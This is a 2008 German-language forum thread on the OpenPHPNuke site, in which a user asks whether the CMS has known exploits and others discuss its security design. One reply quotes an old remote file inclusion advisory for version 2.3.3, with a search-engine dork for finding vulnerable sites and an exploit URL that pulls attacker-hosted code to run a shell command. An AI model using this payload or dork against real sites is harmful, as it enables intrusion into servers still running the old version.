Autor furor
Datum 03.03.2008 11:11
Beiträge: Tach !

Denke gerade drüber nach von Vbulletin auf OpenPHP Nuke umzusteigen und frage mich inwieweit es da mit der Sicherheit ist.

Sind irgendwelche Exploits bekannt oder gibts eine Liste derer ?

Grüße


Autor Scout_GP
Datum 03.03.2008 11:26
Beiträge: Es gibt keine Exploits. Soweit ich weiß, ist bei vernünftiger Serverkonfiguration und vernünftiger OPN Konfiguration zur Zeit kein eindringen möglich.
Sollte doch eine Schwachstelle bekannt werden, so wird diese sofort korrigiert. OPN ist meines erachtens das CMS, was den höchsten Wert auf Sicherheit legt.
Gruß Scout +++ Last.fm | Scoutweb +++


Autor furor
Datum 03.03.2008 11:32
Beiträge: Danke, aber das denkt VBulletin auch. (Auch wenns kein CMS in dem Sinne ist :d)

Naja ich teste datt mal, danke für die Antwort :d



Autor Gast
Datum 03.03.2008 12:59
Beiträge: Im 2006 gab es ein Exploit. Das ist aber auch das einzige wo bekannt ist.
Der Bug war damals in der Version 2.3.3

Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls


Das CMS hat mir der EVA ein ausgeklügelter Sicherheitsmechanismus für Angriff aller Art.


Flash


Autor furor
Datum 03.03.2008 13:46
Beiträge: EVA = Eingabe/Verarbeitung/Ausgabe ?
Oder ist das ein spezieller Scriptbestandteil des CMS ?

Klingt interessant




Autor Gast
Datum 03.03.2008 14:49
Beiträge: Schau mal hier den Thread zur EVA an.

Werde schauen, dass die Customizer Module demnächst in der Doku stehen.

Flash


Autor furor
Datum 03.03.2008 14:59
Beiträge: Nett, Danke das schau ich mir mal an !!

..Sobald meine 16094 files per SFTP endlich aufm US-Host sind
(t- 2:00 - 4:00 h)





Diese Seite drucken
Diese Seite schließen

Dieser Artikel kommt von: OpenPHPNuke - das Open Source CMS
http://www.openphpnuke.info/